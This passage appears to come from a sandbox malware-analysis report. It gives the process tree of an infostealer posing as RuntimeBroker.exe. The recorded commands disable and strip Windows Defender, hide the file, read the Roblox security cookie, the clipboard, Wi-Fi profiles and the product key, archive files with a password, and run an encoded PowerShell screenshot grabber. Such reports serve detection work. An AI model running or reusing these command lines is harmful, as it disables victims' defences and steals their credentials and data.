QANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=27⤵PID:5316
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mv14l0rg\mv14l0rg.cmdline"28⤵PID:5436
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8122.tmp" "c:\Users\Admin\AppData\Local\Temp\mv14l0rg\CSC4FD64BE74D49479DA09D896B21552D62.TMP"29⤵PID:5816
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"26⤵PID:5416
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY27⤵
- Command and Scripting Interpreter: PowerShell
PID:2720
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:5116
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:1668
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:1156
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:3144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:4948
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:5456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:4356
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:6100
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"26⤵PID:3632
-
C:\Windows\system32\tree.comtree /A /F27⤵PID:3248
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"26⤵PID:4724
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY27⤵PID:972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"26⤵PID:5916
-
C:\Windows\system32\getmac.exegetmac27⤵PID:4440
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\4uhNh.zip" *"26⤵PID:5268
-
C:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI24562\rar.exe a -r -hp"skoch" "C:\Users\Admin\AppData\Local\Temp\4uhNh.zip" *27⤵PID:1300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"26⤵PID:2596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV127⤵PID:3216
-
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption27⤵PID:5200
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"26⤵PID:3884
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory27⤵PID:5576
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"26⤵PID:3564
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid27⤵PID:1992
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"26⤵PID:5372
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER27⤵
- Command and Scripting Interpreter: PowerShell
PID:2876
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"26⤵PID:6116
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name27⤵
- Detects videocard installed
PID:420
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"26⤵PID:5744
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault27⤵PID:5176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""26⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5552 -
C:\Windows\system32\PING.EXEping localhost -n 327⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5944
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"23⤵
- Executes dropped EXE
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"24⤵PID:1092
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"22⤵
- Executes dropped EXE
PID:2492 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"23⤵
- Executes dropped EXE
PID:4724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"21⤵
- Executes dropped EXE
PID:5924 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"22⤵
- Executes dropped EXE
PID:2748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"20⤵
- Executes dropped EXE
PID:5196 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"21⤵
- Executes dropped EXE
PID:720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"19⤵
- Executes dropped EXE
PID:3832 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"20⤵
- Executes dropped EXE
PID:4260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"18⤵
- Executes dropped EXE
PID:5548 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"19⤵
- Executes dropped EXE
PID:5588
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"17⤵
- Executes dropped EXE
PID:5384 -
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"18⤵
- Executes dropped EXE
PID:1524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'"19⤵PID:5704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe'20⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"19⤵PID:1872
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend20⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5912
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All20⤵
- Deletes Windows Defender Definitions
PID:5832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe""19⤵
- Hide Artifacts: Hidden Files and Directories
PID:6140 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"20⤵
- Views/modifies file attributes
PID:5892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"19⤵PID:1588
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'20⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3264
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"19⤵PID:1168
-
C:\Windows\system32\tasklist.exetasklist /FO LIST20⤵
- Enumerates processes with tasklist
PID:1904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"19⤵PID:5960
-
C:\Windows\system32\tasklist.exetasklist /FO LIST20⤵
- Enumerates processes with tasklist
PID:3904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"19⤵PID:988
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName20⤵
- Suspicious behavior: EnumeratesProcesses
PID:1116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"19⤵
- Clipboard Data
PID:5864 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:5564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard20⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"19⤵PID:5800
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV120⤵PID:5896
-
-
C:\Windows\system32\tasklist.exetasklist /FO LIST20⤵
- Enumerates processes with tasklist
PID:2336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:5884
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:5392
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"19⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6048 -
C:\Windows\system32\netsh.exenetsh wlan show profile20⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5836
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"19⤵PID:6120
-
C:\Windows\system32\systeminfo.exesysteminfo20⤵
- Gathers system information
PID:5856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="19⤵PID:4544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=20⤵PID:5936
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0q02bg3\g0q02bg3.cmdline"21⤵PID:1864
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3F94.tmp" "c:\Users\Admin\AppData\Local\Temp\g0q02bg3\CSC65BC372D77ED40E1804DF044A1EEDA85.TMP"22⤵PID:3636
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:3440
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:4260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:420
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:4564
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:1696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:720
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:5596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"19⤵PID:2464
-
C:\Windows\system32\tree.comtree /A /F20⤵PID:5016
-
-
-
